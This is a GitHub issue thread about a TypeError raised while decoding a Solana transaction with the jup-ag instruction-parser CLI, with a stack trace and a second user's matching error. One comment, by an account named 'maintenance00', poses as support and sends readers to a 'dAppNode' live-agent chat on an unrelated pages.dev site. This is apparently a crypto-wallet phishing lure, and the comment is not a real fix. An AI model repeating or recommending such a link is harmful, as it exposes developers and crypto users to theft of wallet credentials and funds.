### ISSUE TITLE
TypeError: Cannot read properties of null (reading 'property')

### ISSUE THREAD

**Issue by amalashkevich** [jup-ag/instruction-parser#32]
```
yarn start lookup-tx --signature 5pcpYhqJyyHHxVaa9mvchML6Njro5Chxv7EFjHPSwxVpdyGAt6uVhd1xUBmXe7ztiuhS1iHFgXm67nwr7mem5itu --rpc https://api.mainnet-beta.solana.com
yarn run v1.22.19
$ ts-node src/cli.ts lookup-tx --signature 5pcpYhqJyyHHxVaa9mvchML6Njro5Chxv7EFjHPSwxVpdyGAt6uVhd1xUBmXe7ztiuhS1iHFgXm67nwr7mem5itu --rpc https://api.mainnet-beta.solana.com
/Users/dev/jup-ag/instruction-parser/node_modules/buffer-layout/lib/Layout.js:1692
      dest[clo.property] = this.defaultLayout.decode(b, offset + contentOffset);
               ^
TypeError: Cannot read properties of null (reading 'property')
    at Union.decode (/Users/dev/jup-ag/instruction-parser/node_modules/buffer-layout/lib/Layout.js:1692:16)
    at Structure.decode (/Users/dev/jup-ag/instruction-parser/node_modules/buffer-layout/lib/Layout.js:1234:32)
    at Sequence.decode (/Users/dev/jup-ag/instruction-parser/node_modules/buffer-layout/lib/Layout.js:1090:34)
    at Structure.decode (/Users/dev/jup-ag/instruction-parser/node_modules/buffer-layout/lib/Layout.js:1234:32)
    at WrappedLayout.decode (/Users/dev/jup-ag/instruction-parser/node_modules/@coral-xyz/borsh/src/index.ts:111:37)
    at Structure.decode (/Users/dev/jup-ag/instruction-parser/node_modules/buffer-layout/lib/Layout.js:1234:32)
    at BorshInstructionCoder.decode (/Users/dev/jup-ag/instruction-parser/node_modules/@coral-xyz/anchor/src/coder/borsh/instruction.ts:107:28)
    at InstructionParser.getInitialAndFinalSwapPositions (/Users/dev/jup-ag/instruction-parser/src/lib/instruction-parser.ts:81:41)
    at /Users/dev/jup-ag/instruction-parser/src/index.ts:112:12
    at Generator.next (<anonymous>)
error Command failed with exit code 1.

```

**Comment by maintenance00** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)
Thank you for posting @amalashkevich

**Comment by SunitRoy2703** [comment]
Is there any development on this issue, I'm facing the same

`"err": {
    "type": "TypeError",
    "message": "Cannot read properties of null (reading 'property')",
    "stack": "TypeError: Cannot read properties of null (reading 'property')"
    },
"msg": "Cannot read properties of null (reading 'property')"
}`
